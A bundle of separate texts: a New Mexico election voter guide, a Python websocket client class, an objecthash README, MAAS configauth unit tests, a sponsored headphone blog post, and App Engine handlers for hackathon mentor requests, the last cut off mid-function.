In District 29, Republican Gregory Baca and the Democratic incumbent, Michael Sanchez, are competing to represent a wide swath of Valencia County and a small portion of Bernalillo County that includes Belen, Tomé and Isleta Pueblo.
Baca is an attorney, Gulf War veteran and owner of a self-service car wash. Sanchez has been a Senate member since 1993 and the Democratic floor leader since 2004. Sanchez supports a code of ethics for elected and appointed officials similar to the existing legislators’ code, which is a legislative rule. “Despite recent scandals and headlines involving certain officials, I believe they are the exception, while most serve with integrity,” he said.
In House District 23, Republican incumbent Paul Pacheco is being challenged by Democrat challenger Daymon Ely. The district is comprised of the portion of Albuquerque that runs along Coors Boulevard roughly from Montaño Road to Corrales.
Pacheco is a former police officer. He plans to archive and make legislative hearings available to the general public. He supported a bill last session that would create an independent ethics commission with the authority to hold public servants accountable for wrongdoing. He supports identifying accommodations within the state’s budget to fund early childhood development programs.
Ely is campaigning against over-testing children in schools and said he will seek pay increases for educators. He supports aggressive development of alternative energy and helping local businesses grow. He supports creating an independent ethics commission. “Given the history of corruption and ethical violations by some of our public officials, it is clear that we need a code of ethics in New Mexico,” he said.
The resignation and eventual conviction of Dianna Duran for fraud involving her own campaign funds led to a special election for her office. The governor appointed Albuquerque City Councilor Brad Winter to fill Duran’s unexpired term. Winter is not running.
Vying for the job are Republican Nora Espinoza and Democrat Maggie Toulouse Oliver. The secretary of state oversees statewide elections and the state’s database of corporations. The secretary of state is second in the line of succession behind the governor and the lieutenant governor.
Espinoza, a former teacher, is a Republican state representative from Roswell who currently represents a vast area that stretches from Roswell to Corona to Carrizozo. In 2013 Espinoza tried to ban books on Mexican-American studies from public schools. She seeks to change campaign finance reporting by clearly defining who must report and what has to be disclosed, including dark money participants.
“The SOS must follow the law – not attempt to create law. The SOS must ensure election integrity without favoring any one group over another,” she said.
Toulouse Oliver has been Bernalillo County Clerk since 2007. She narrowly lost to Duran in 2014; she seeks to change campaign finance reporting by writing rules that are easier for candidates to comply with, and to help the public understand relationships between candidates and donors.
Judith Nakamura and Michael Vigil are competing for a spot on the highest court in the state, which has jurisdiction over all lower courts.
Nakamura, who was appointed to a vacancy by Gov. Susana Martinez, is currently one of five Supreme Court justices. She previously was appointed by the governor to the Bernalillo County District Court. She’s a former Metropolitan Court chief judge who was honored by MADD as national judge of the year for combatting DWI. She seeks to improve resource availability and speed up the court process.
Vigil has been a judge of the New Mexico Court of Appeals for 13 years. He was twice recommended as qualified for the New Mexico Supreme Court by a bipartisan nominating commission. He was appellate counsel in over 50 precedent-setting cases as a practicing attorney for 27 years.
Patricia Paiz is running against Steven Michael Quezada for Bernalillo County Commissioner of District 2 to replace Art De La Cruz, who couldn’t run again due to term limits. The County Commission is in charge of the county government budget, ordinances and resolutions, as well as zoning and business regulation.
Paiz spent 20 years as a police officer. She’s a board member of Albuquerque Metropolitan Crime Stoppers. If elected, she plans to consolidate some departments, eliminate sprawl development and address the needs of Pajarito Mesa, an area of Bernalillo County with no running water or power.
Quezada has served as an APS Board Member and is a member of the Route 66 West Side Neighborhood Association. He said he will ensure that a voter-approved behavioral health tax is implemented prudently. He said he wants to protect the open space and farming of the South Valley. “We can never let another Pajarito Mesa happen in our community again,” he said.
Republican Kim Hillard and Democrat Nancy Bearce are competing for the scandal-plagued office of Bernalillo County Treasurer. The treasurer is responsible for collecting property taxes and investment of funds.
The office has been held for the last 12 years by either Manny Ortiz or Patrick Padilla, both of whom have been accused of mismanaging county investments.
Hillard has a background in data systems administration and personnel management, and said she plans to restore confidence in the office. “Audits of past years that were negative must be reviewed and changes implemented,” he said. Hillard said he would ensure a balanced investment portfolio and the hiring of a well-qualified investment officer.
“The County Commission and treasurer must agree on the hiring of the investment officer, which brokers can do business with the County and how much cash must be retained,” he said.
Nancy Bearce served as a manager in employee benefits for the state government and Albuquerque Public Schools. She plans to review all procedures, policies and recent internal audits to ensure compliance with investment guidelines.
Voters are being asked whether they want to amend the New Mexico Constitution to give judges the ability to hold accused criminals in jail without bond if they believe a suspect to be a danger to the public or pose a flight risk.
Additionally, the amendment states that defendants shall not be held in jail because of their inability to raise bail. Practically, that would mean that a judge, based on a defendant’s history, could release them on thier own recognizance. Studies in states in which such changes to bail laws have been made show that defendants released on no-money bonds show up for court at the same rates as those that post money bonds.
The New Mexico Supreme Court, which supports the amendment, argues that it will reduce the cost of pre-trial incarceration and save money for the state’s 33 counties, which operate the state’s local jails.
Sara MacNeil, a former reporter for the Daily Lobo, is an ABQ Free Press Weekly editorial intern.
|
import asyncio
import json
import logging
import signal
from typing import Callable, List, Optional
import websockets
from .dumpling import Dumpling
from .exceptions import InvalidDumpling
from ._shared import ND_CLOSE_MSGS, HUB_HOST, HUB_OUT_PORT
class DumplingEater:
"""
Base helper class for Python-based dumpling eaters.
Connects to ``nd-hub`` and listens for any dumplings made by the provided
``chef_filter`` (or all chefs if ``chef_filter`` is ``None``). Can be
given ``async`` callables for any of the following events:
``on_connect(websocket_uri, websocket_obj)``
invoked when the connection to ``nd-hub`` is made
``on_dumpling(dumpling)``
invoked whenever a dumpling is emitted from ``nd-hub``
``on_connection_lost(e)``
invoked when the connection to ``nd-hub`` is closed
**The above callables must be** ``async def`` **methods**.
:param name: Name of the dumpling eater. Is ideally unique per eater.
:param hub: Address where ``nd-hub`` is sending dumplings from.
:param chef_filter: List of chef names whose dumplings this eater wants to
receive. ``None`` means get all chefs' dumplings.
:param on_connect: Called when connection to ``nd-hub`` is made. Is passed
two parameters: the ``nd-hub`` websocket URI (string) and websocket
object (:class:`websockets.client.WebSocketClientProtocol`).
:param on_dumpling: Called whenever a dumpling is received. Is passed the
dumpling as a Python dict.
:param on_connection_lost: Called when connection to ``nd-hub`` is lost. Is
passed the associated exception object.
"""
def __init__(
self,
name: str = 'nameless_eater',
hub: str ='{}:{}'.format(HUB_HOST, HUB_OUT_PORT),
*,
chef_filter: Optional[List[str]] = None,
on_connect: Optional[Callable] = None,
on_dumpling: Optional[Callable] = None,
on_connection_lost: Optional[Callable] = None) -> None:
self.name = name
self.chef_filter = chef_filter
self.hub = hub
self.hub_ws = "ws://{0}".format(hub)
# Configure handlers. If we're not provided with handlers then we
# fall back on the default handlers or the handlers provided by a
# subclass.
self.on_connect = (
on_connect if on_connect is not None else self.on_connect
)
self.on_dumpling = (
on_dumpling if on_dumpling is not None else self.on_dumpling
)
self.on_connection_lost = (
on_connection_lost if on_connection_lost is not None
else self.on_connection_lost
)
self._was_connected = False
self._logger_name = "{}.{}".format(__name__, self.name)
self.logger = logging.getLogger(self._logger_name)
def __repr__(self):
def handler_string(attr):
# We can't use 'repr(self.handler)' for callables because it causes
# an infinite loop as the repr of the handler includes the repr of
# the handler (etc). So we replace handler reprs with
# '<callable: name>'.
return (
'<callable: {}>'.format(attr.__name__) if callable(attr)
else repr(attr)
)
return (
'{}('
'name={}, '
'hub={}, '
'chef_filter={}, '
'on_connect={}, '
'on_dumpling={}, '
'on_connection_lost={})'.format(
type(self).__name__,
repr(self.name),
repr(self.hub),
repr(self.chef_filter),
handler_string(self.on_connect),
handler_string(self.on_dumpling),
handler_string(self.on_connection_lost),
)
)
async def _grab_dumplings(self, dumpling_count=None):
"""
Receives all dumplings from the hub and looks for any dumplings which
were created by the chef(s) we're interested in. All those dumplings
are then passed to the on_dumpling handler (after being converted from
their JSON form back into a Dumpling instance).
:param dumpling_count: Number of dumplings to eat. ``None`` means eat
forever.
"""
dumplings_eaten = 0
websocket = await websockets.client.connect(self.hub_ws)
self._was_connected = True
self.logger.info("{0}: Connected to dumpling hub at {1}".format(
self.name, self.hub_ws))
try:
# Announce ourselves to the dumpling hub.
await websocket.send(json.dumps({'eater_name': self.name}))
if self.on_connect:
await self.on_connect(self.hub_ws, websocket)
while True:
# Eat a single dumpling.
dumpling_json = await websocket.recv()
# Create a Dumpling from the JSON received over the websocket.
# Note that invalid dumplings will probably be stripped out by
# the hub already.
try:
dumpling = Dumpling.from_json(dumpling_json)
except InvalidDumpling as e:
self.logger.error("{0}: Invalid dumpling: {1}".format(
self.name, e))
continue
self.logger.debug("{0}: Received dumpling from {1}".format(
self.name, dumpling.chef_name))
# Call the on_dumpling handler if this dumpling is from a
# chef that we've registered interest in.
if (self.chef_filter is None or
dumpling.chef_name in self.chef_filter):
self.logger.debug(
"{0}: Calling dumpling handler {1}".format(
self.name, self.on_dumpling))
dumplings_eaten += 1
await self.on_dumpling(dumpling)
# Stop eating dumplings if we've reached our threshold.
if dumpling_count is not None and \
dumplings_eaten >= dumpling_count:
await websocket.close(*ND_CLOSE_MSGS['eater_full'])
break
except asyncio.CancelledError:
self.logger.warning(
f"\n{self.name}: Connection to dumpling hub cancelled; "
f"closing..."
)
try:
await websocket.close(*ND_CLOSE_MSGS['conn_cancelled'])
except websockets.exceptions.InvalidState:
pass
except websockets.exceptions.ConnectionClosed as e:
self.logger.warning(
"{}: Lost connection to dumpling hub: {}".format(self.name, e)
)
if self.on_connection_lost:
await self.on_connection_lost(e)
@staticmethod
def _interrupt_handler():
"""
Signal handler. Cancels all running async tasks.
"""
tasks = asyncio.Task.all_tasks()
for task in tasks:
task.cancel()
def run(self, dumpling_count=None):
"""
Run the dumpling eater.
This will block until the desired ``dumpling_count`` is met.
:param dumpling_count: Number of dumplings to eat. ``None`` means eat
forever.
"""
self.logger.info("{0}: Running dumpling eater".format(self.name))
if not callable(self.on_dumpling):
self.logger.error(
"{0}: on_dumpling handler is not callable".format(self.name))
return
self.logger.debug("{0}: Looking for dumpling hub at {1}".format(
self.name, self.hub_ws))
self.logger.debug("{0}: Chefs: {1}".format(
self.name,
", ".join(self.chef_filter) if self.chef_filter else 'all')
)
try:
asyncio.run(self._grab_dumplings(dumpling_count))
except OSError as e:
self.logger.warning(
"{0}: There was a problem with the dumpling hub connection. "
"Is nd-hub available?".format(self.name))
self.logger.warning("{0}: {1}".format(self.name, e))
finally:
if self._was_connected:
self.logger.warning(
"{0}: Done eating dumplings.".format(self.name))
async def on_connect(self, websocket_uri, websocket_obj):
"""
Default on_connect handler.
This will be used if an ``on_connect`` handler is not provided during
instantiation, and if a handler is not provided by a DumplingEater
subclass.
Only logs an warning-level log entry.
"""
self.logger.warning(
'{}: No on_connect handler specified; ignoring '
'connection.'.format(self.name)
)
async def on_dumpling(self, dumpling):
"""
Default on_dumpling handler.
This will be used if an ``on_dumpling`` handler is not provided during
instantiation, and if a handler is not provided by a DumplingEater
subclass.
Only logs an warning-level log entry.
"""
self.logger.warning(
'{}: No on_dumpling handler specified; ignoring '
'dumpling.'.format(self.name)
)
async def on_connection_lost(self, e):
"""
Default on_connection_lost handler.
This will be used if an ``on_connection_lost`` handler is not provided
during instantiation, and if a handler is not provided by a
DumplingEater subclass.
Only logs an warning-level log entry.
"""
self.logger.warning(
'{}: No on_connection_lost handler specified; ignoring '
'connection loss.'.format(self.name)
)
|
GitHub - benlaurie/objecthash: A way to cryptographically hash objects (in the JSON-ish sense) that works cross-language. And, therefore, cross-encoding.
A way to cryptographically hash objects (in the JSON-ish sense) that works cross-language. And, therefore, cross-encoding.
Want to be notified of new releases in benlaurie/objecthash?
You only need to do the make get the first time.
Take a look at objecthash_test.*.
Now you can sign objects regardless of the transport encoding and programming language used.
Most object signing/verifying schemes (e.g. X509v3, JOSE) work by signing or verifying some canonical binary or text form of the object, which you then decode and hope you end up with what was actually signed. Using objecthash you decode first, then verify. If verification works, then the object you have is the object that was signed in the first place.
If your data is guessable, then redaction doesn't really help: the data can easily be reconstructed with a brute force attack. So, objecthash offers a way to decorate an object so that everything in it can be redacted and be safe from brute-forcing. redactable(o) turns every basic object (except keys) in o into an array with two entries, the first being a 32 byte random string. Since keys are required to be strings, those are prefixed with the random string.
Python distinguishes between int and float when parsing JSON, which makes it incompatible with GO - all numbers are float in Go. Common JSON functions convert Python JSON to Common JSON first.
|
# Copyright 2018 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Test the configauth command."""
from contextlib import contextmanager
from datetime import datetime, timedelta
import json
import tempfile
import unittest
from django.contrib.sessions.models import Session
from django.core.management import call_command
from django.core.management.base import CommandError
from maasserver.management.commands import configauth
from maasserver.models import Config
from maasserver.models.rbacsync import RBAC_ACTION, RBACLastSync, RBACSync
from maasserver.rbac import FakeRBACUserClient
from maasserver.testing.testcase import MAASServerTestCase
class TestConfigAuthCommand(MAASServerTestCase):
def setUp(self):
super().setUp()
self.read_input = self.patch(configauth, "read_input")
self.read_input.return_value = ""
self.mock_print = self.patch(configauth, "print")
self.rbac_user_client = FakeRBACUserClient()
mock_client = self.patch(configauth, "RBACUserClient")
mock_client.return_value = self.rbac_user_client
@contextmanager
def agent_file(self):
with tempfile.NamedTemporaryFile(mode="w+") as agent_file:
config = {
"key": {"public": "public-key", "private": "private-key"},
"agents": [
{
"url": "http://example.com:1234",
"username": "user@admin",
}
],
}
json.dump(config, agent_file)
agent_file.flush()
yield agent_file.name
def printout(self):
prints = []
for call in self.mock_print.mock_calls:
_, output, _ = call
# Empty tuple if print is called with no text
output = output[0] if output else ""
prints.append(output)
return "\n".join(prints)
def test_configauth_changes_empty_string(self):
Config.objects.set_config(
"external_auth_url", "http://example.com/candid"
)
call_command("configauth", candid_agent_file="")
self.assertEqual("", Config.objects.get_config("external_auth_url"))
def test_configauth_changes_auth_prompt_default(self):
self.read_input.return_value = ""
call_command("configauth")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual("", Config.objects.get_config("external_auth_url"))
def test_configauth_changes_auth_invalid_rbac_url(self):
self.assertRaises(
configauth.InvalidURLError,
call_command,
"configauth",
rbac_url="example.com",
)
def test_configauth_delete_sessions(self):
session = Session(
session_key="session_key",
expire_date=datetime.utcnow() + timedelta(days=1),
)
session.save()
call_command("configauth", rbac_url="")
self.assertFalse(Session.objects.all().exists())
def test_update_auth_details(self):
auth_details = configauth.AuthDetails()
with self.agent_file() as agent_file_name:
configauth.update_auth_details_from_agent_file(
agent_file_name, auth_details
)
self.assertEqual(auth_details.url, "http://example.com:1234")
self.assertEqual(auth_details.user, "user@admin")
self.assertEqual(auth_details.key, "private-key")
def test_configauth_interactive(self):
with self.agent_file() as agent_file_name:
self.read_input.side_effect = [
"",
agent_file_name,
"mydomain",
"admins",
]
call_command("configauth")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
self.assertEqual(
"admins", Config.objects.get_config("external_auth_admin_group")
)
def test_configauth_interactive_domain(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = "mydomain"
call_command(
"configauth", rbac_url="", candid_agent_file=agent_file_name
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_interactive_domain_empty(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = ""
call_command(
"configauth", rbac_url="", candid_agent_file=agent_file_name
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_interactive_key(self):
with self.agent_file() as agent_file_name:
self.read_input.return_value = "private-key"
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="mydomain",
)
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
def test_configauth_not_interactive(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="mydomain",
candid_admin_group="admins",
)
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertEqual(
"http://example.com:1234",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"mydomain", Config.objects.get_config("external_auth_domain")
)
self.assertEqual(
"user@admin", Config.objects.get_config("external_auth_user")
)
self.assertEqual(
"private-key", Config.objects.get_config("external_auth_key")
)
self.assertEqual(
"admins", Config.objects.get_config("external_auth_admin_group")
)
self.read_input.assert_not_called()
def test_configauth_agentfile_not_found(self):
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="",
candid_agent_file="/not/here",
)
self.assertEqual(
str(error), "[Errno 2] No such file or directory: '/not/here'"
)
def test_configauth_domain_none(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="",
candid_agent_file=agent_file_name,
candid_domain="none",
)
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
def test_configauth_json_empty(self):
call_command("configauth", json=True)
self.read_input.assert_not_called()
[print_call] = self.mock_print.mock_calls
_, [output], kwargs = print_call
self.assertEqual({}, kwargs)
self.assertEqual(
{
"external_auth_url": "",
"external_auth_domain": "",
"external_auth_user": "",
"external_auth_key": "",
"external_auth_admin_group": "",
"rbac_url": "",
},
json.loads(output),
)
def test_configauth_json_full(self):
Config.objects.set_config(
"external_auth_url", "http://candid.example.com/"
)
Config.objects.set_config("external_auth_domain", "mydomain")
Config.objects.set_config("external_auth_user", "maas")
Config.objects.set_config("external_auth_key", "secret maas key")
Config.objects.set_config("external_auth_admin_group", "admins")
Config.objects.set_config("rbac_url", "http://rbac.example.com/")
mock_print = self.patch(configauth, "print")
call_command("configauth", json=True)
self.read_input.assert_not_called()
[print_call] = mock_print.mock_calls
_, [output], kwargs = print_call
self.assertEqual({}, kwargs)
self.assertEqual(
{
"external_auth_url": "http://candid.example.com/",
"external_auth_domain": "mydomain",
"external_auth_user": "maas",
"external_auth_key": "secret maas key",
"external_auth_admin_group": "admins",
"rbac_url": "http://rbac.example.com/",
},
json.loads(output),
)
def test_configauth_rbac_with_name_existing(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="mymaas",
)
self.read_input.assert_not_called()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
self.rbac_user_client.registered_services,
["/api/rbac/v1/service/4"],
)
def test_configauth_rbac_with_name_create(self):
patch_prompt = self.patch(configauth, "prompt_for_choices")
patch_prompt.return_value = "yes"
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="maas",
)
patch_prompt.assert_called_once()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
self.rbac_user_client.registered_services,
["/api/rbac/v1/service/4"],
)
def test_configauth_rbac_with_name_abort(self):
patch_prompt = self.patch(configauth, "prompt_for_choices")
patch_prompt.return_value = "no"
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="maas",
)
self.assertEqual(str(error), "Registration with RBAC service canceled")
patch_prompt.assert_called_once()
self.assertEqual(Config.objects.get_config("rbac_url"), "")
self.assertEqual(self.rbac_user_client.registered_services, [])
def test_configauth_rbac_registration_list(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": False,
"product": {"$ref" "/api/rbac/v1/product/2"},
},
{
"name": "mymaas2",
"$uri": "/api/rbac/v1/service/12",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
},
]
# The index of the service to register is prompted
self.read_input.side_effect = ["2"]
call_command("configauth", rbac_url="http://rbac.example.com")
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertEqual(
"http://auth.example.com",
Config.objects.get_config("external_auth_url"),
)
self.assertEqual(
"u-1", Config.objects.get_config("external_auth_user")
)
self.assertNotEqual("", Config.objects.get_config("external_auth_key"))
self.assertEqual("", Config.objects.get_config("external_auth_domain"))
self.assertEqual(
"", Config.objects.get_config("external_auth_admin_group")
)
prints = self.printout()
self.assertIn("1 - mymaas", prints)
self.assertIn("2 - mymaas2 (pending)", prints)
self.assertIn('Service "mymaas2" registered', prints)
def test_configauth_rbac_registration_invalid_index(self):
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
self.read_input.side_effect = ["2"]
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
)
self.assertEqual(str(error), "Invalid index")
def test_configauth_rbac_no_registerable(self):
error = self.assertRaises(
CommandError,
call_command,
"configauth",
rbac_url="http://rbac.example.com",
)
self.assertEqual(
str(error),
"No registerable MAAS service on the specified RBAC server",
)
def test_configauth_rbac_url_none(self):
with self.agent_file() as agent_file_name:
call_command(
"configauth",
rbac_url="none",
candid_agent_file=agent_file_name,
candid_domain="domain",
candid_admin_group="admins",
)
self.read_input.assert_not_called()
self.assertEqual("", Config.objects.get_config("rbac_url"))
def test_configauth_rbac_url_none_clears_lastsync_and_sync(self):
RBACLastSync.objects.create(resource_type="resource-pool", sync_id=0)
RBACSync.objects.create(resource_type="")
call_command("configauth", rbac_url="none", candid_agent_file="none")
self.assertEqual("", Config.objects.get_config("rbac_url"))
self.assertFalse(RBACLastSync.objects.all().exists())
self.assertFalse(RBACSync.objects.all().exists())
def test_configauth_rbac_clears_lastsync_and_full_sync(self):
RBACLastSync.objects.create(resource_type="resource-pool", sync_id=0)
self.rbac_user_client.services = [
{
"name": "mymaas",
"$uri": "/api/rbac/v1/service/4",
"pending": True,
"product": {"$ref" "/api/rbac/v1/product/2"},
}
]
call_command(
"configauth",
rbac_url="http://rbac.example.com",
rbac_service_name="mymaas",
)
self.read_input.assert_not_called()
self.assertEqual(
"http://rbac.example.com", Config.objects.get_config("rbac_url")
)
self.assertFalse(RBACLastSync.objects.all().exists())
latest = RBACSync.objects.order_by("-id").first()
self.assertEqual(RBAC_ACTION.FULL, latest.action)
self.assertEqual("", latest.resource_type)
self.assertEqual("configauth command called", latest.source)
class TestIsValidUrl(unittest.TestCase):
def test_valid_schemes(self):
for scheme in ["http", "https"]:
url = "{}://example.com/candid".format(scheme)
self.assertTrue(configauth.is_valid_url(url))
def test_invalid_schemes(self):
for scheme in ["ftp", "git+ssh"]:
url = "{}://example.com/candid".format(scheme)
self.assertFalse(configauth.is_valid_url(url))
|
Each year, as I continue to grow as an individual and a brand, I like to showcase the new facets of my life and have it reflect in the content I create. This year more than ever, I’m trying to maintain a firm grasp on my goals, block out the noise, and stay focused. One thing that has definitely helped me to do that, was incorporating a gym regimen into my weekly routine. I don’t think a lot of people realize how important exercise is to not just your body, but your mind as well. Though true, I’d be lying if I said it was always easy forcing myself into the gym especially during days when I feel the most exhausted. For me, music is a huge necessity when exercising as it really allows me to get lost in the moment and forget any ounce of lingering stress, even if it is just for an hour or so. I am so grateful that I was offered the opportunity to collaborate with a brand that creates premium quality headphones for every scenario life has to offer. Sudio is a Swedish brand, whose main objective is to provide studio quality sound through various styles of earphones made for any occasion. As a resident of NYC, I find myself reaching for my earbuds most often while on the train, in the gym, or those late nights in my apartment went I don’t want to disturb my roommates. Luckily, their sleek styles and practical construction, allow for an overall experience of high quality technology as well as an elegant accessory for your day to day style. I thought it would be cool to switch things up by pairing my new Regent headphones with an active wear ensemble as it is something I have never done, and because fitness is slowly but surely becoming a consistent part of my life. I loved how the gold accents brought out the detail in my leggings, and the wireless design allowed them to be easily functional with no hassle when taking them on and off. I chose the classic black because to me, they were the most timeless and can be paired with anything whether at the gym, or on the go. Sudio was also generous enough to provide me with a 15% off coupon code: ASTYLEDMIND, that is valid forever on all of their products and add-ons. Please let me know in the comments below if you’re interested in seeing more lifestyle posts in addition to the style blogs we all know and love. Until next time!
Loving the look. Keep it coming.
|
import webapp2
from template import template
from google.appengine.ext import ndb
from google.appengine.api import datastore_errors
import models
from registration import Hacker
import logging
import json
from google.appengine.api import users
import datetime
maxRating = 5
minRating = 0
def ratingValidator(prop, value):
if value > maxRating:
value = maxRating
if value < minRating:
value = minRating
class MentorResponse(ndb.Model):
rating = ndb.IntegerProperty(default=None, validator=ratingValidator)
request = ndb.KeyProperty(kind='MentorRequest')
mentor = ndb.KeyProperty(kind='Mentor')
dispatched = ndb.DateTimeProperty(auto_now_add=True)
dispatcher = ndb.StringProperty(validator=models.stringValidator)
finished = ndb.DateTimeProperty()
def formatMentorResponse(mentorResponse):
mr = mentorResponse.get()
return {'mentor' : mr.mentor.urlsafe(), 'request' : mr.request.urlsafe(), 'id' : mr.key.urlsafe()}
#Anyone who will give help to a hacker.
class Mentor(ndb.Model):
phone = ndb.StringProperty(validator=models.phoneValidator, default=None)
email = ndb.StringProperty(validator=models.stringValidator, default=None)
name = ndb.StringProperty()
tags = ndb.StringProperty(validator=models.stringValidator, repeated=True)
role = ndb.TextProperty() # e.g. Oracle Engineer
availability = ndb.TextProperty()
details = ndb.TextProperty()
responded = ndb.KeyProperty(kind=MentorResponse, repeated=True)
#perhaps should be key property
assigned = ndb.BooleanProperty(default=False)
def getResponded(self):
return [key.get() for key in self.responded]
def computeAvg(self):
responded = self.getResponded()
ratedResponded = [x for x in responded if x.rating]
if len(ratedResponded) == 0:
return 3
else:
return (reduce(lambda x, y: x + y.rating, ratedResponded, 0) / len(ratedResponded))
def asDict(self, include_keys):
return {key: getattr(self, key, None) for key in include_keys}
def formatMentor(mentor):
md = mentor.asDict(Mentor._properties)
md['responded'] = len(mentor.responded)
md['id'] = mentor.key.urlsafe()
md['rating'] = mentor.computeAvg()
return md
class MentorRequest(ndb.Model):
requester = ndb.KeyProperty(default=None)
requester_phone = ndb.StringProperty(default=None, validator=models.stringValidator)
location = ndb.StringProperty(default=None)
created = ndb.DateTimeProperty(auto_now_add=True)
responses = ndb.KeyProperty(kind=MentorResponse, repeated=True)
issue = ndb.TextProperty(required=False)
tags = ndb.StringProperty(repeated=True)
status = ndb.StringProperty(choices=['solved', 'assigned', 'unassigned'], default='unassigned')
def asDict(self, include_keys):
d = {key: getattr(self, key, None) for key in include_keys}
return d
def formatRequest(mentorRequest):
mr = mentorRequest.asDict(['location', 'created', 'issue', 'tags', 'status'])
mr['created'] = pretty_date(mentorRequest.created)
mr['id'] = mentorRequest.key.urlsafe()
mr['responses'] = len(mentorRequest.responses)
mr['requester_phone'] = mentorRequest.requester_phone
mr['requester_name'] = mentorRequest.requester.get().name if mentorRequest.requester else None
return mr
class MentorRequestHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template('mentor_request.html', {}))
def post(self):
hackers = Hacker.query(Hacker.phone_number == self.request.get('phone')).fetch(keys_only=True)
request = MentorRequest()
request.location = self.request.get('location')
request.issue = self.request.get('issue')
request.tags = self.request.get('tags').split(', ')
if len(hackers):
request.requester = hackers[0]
request.requester_phone = self.request.get('phone')
request.put()
self.redirect('/?dayof=1#mrc') # #mrc: mentor-request-confirm (we don't want that showing up in URLs)
class MentorSignupHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_signup.html"))
def post(self):
keys = ['name', 'role', 'email', 'phone', 'availability', 'tags', 'details']
try:
mentor = Mentor()
for key in keys:
val = self.request.get(key)
if key == 'tags':
val = [tag.strip().lower() for tag in val.split(',')]
setattr(mentor, key, val)
mentor.put()
first_name = mentor.name.split(' ')[0] if mentor.name else 'mentor'
self.response.write(template("mentor_signup.html", {"show_confirmation": True, "first_name": first_name}))
except datastore_errors.BadValueError as e:
print "MENTOR SIGNUP ERROR: {0}".format(e)
self.response.write(template("mentor_signup.html", {"error": "There's an invalid or missing field on your form!"}))
class DispatchHandler(webapp2.RequestHandler):
def get(self):
self.response.write(template("mentor_dispatch.html"))
def post(self):
data = json.loads(self.request.body)
request = ndb.Key(urlsafe=data['request']).get()
mentor = ndb.Key(urlsafe=data['mentor']).get()
response = MentorResponse()
response.dispatcher = users.get_current_user().email()
response.mentor = mentor.key
response.request = request.key
response.put()
mentor.responded.append(response.key)
mentor.assigned = True
request.responses.append(response.key)
request.status='assigned'
request.put()
mentor.put()
return self.response.write(json.dumps({'success' : True}))
class ResponseFinishedHandler(webapp2.RequestHandler):
def post(self):
data = json.loads(self.request.body)
response = ndb.Key(urlsafe=data['id']).get()
mentor = response.mentor.get()
request = response.request.get()
if data.get('rating'):
response.rating = int(data.get('rating'))
request.status = data['status'] #could be completed or unassigned
response.finished = datetime.datetime.now()
mentor.assigned = False
response.put()
mentor.put()
request.put()
return self.response.write(json.dumps({'success' : True}))
class GetRequestsHandler(webapp2.RequestHandler):
def get(self):
requests = map(formatRequest, MentorRequest.query(MentorRequest.status == 'unassigned').order(MentorRequest.created).fetch())
return self.response.write(json.dumps({'requests' : requests}))
class GetAssignedHandler(webapp2.RequestHandler):
def get(self):
mentors = Mentor.query(Mentor.assigned == True).fetch()
mentors = map(formatMentor, mentors)
requests = MentorRequest.query(MentorRequest.status == 'assigned').fetch()
pairs = [r.responses[-1] for r in requests if len(r.responses) > 0]
pairs = map(formatMentorResponse, pairs)
requests = map(formatRequest, requests)
self.response.write(json.dumps({'assigned_mentors' : mentors, 'assigned_requests' : requests, 'pairs' : pairs}))
class ViewRequestHandler(webapp2.RequestHandler):
def get(self, id):
request = ndb.Key(urlsafe=id).get()
mentors = map(formatMentor, findMentorsForRequest(request))
